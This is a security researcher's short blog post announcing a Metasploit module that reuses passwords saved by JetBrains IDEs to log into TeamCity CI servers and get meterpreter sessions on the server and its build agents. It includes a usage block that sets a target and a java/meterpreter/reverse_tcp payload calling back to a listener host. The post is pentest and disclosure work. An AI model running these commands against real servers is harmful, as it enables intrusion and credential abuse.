Kacper Szurek Tags Polish Newsletter About

YouTube Webinary Facebook Twitter

TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter

Pentest TeamCity Server using Metasploit

11-02-2018 / Vulnerabilities

Pentest TeamCity Server using Metasploit

Obtain passwords from JetBrains IDE (like IntelliJ or PyCharm) and use those credentials inside TeamCity Continuous Integration Server in order to get meterpreter session on server and build agents using metasploit.

How JetBrains IDE store passwords?

Metasploit module demo:

Basic usage:

use exploit/teamcity
set RHOST 192.168.1.1
set RPORT 8111
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.118
set LPORT 4444
set USERNAME your_user_name
set PASSWORD your_password
exploit

Timeline

11-02-2018: Release

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

2 MIN READ

Gitea 1.4.0 Unauthenticated Remote Code Execution

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

1 MIN READ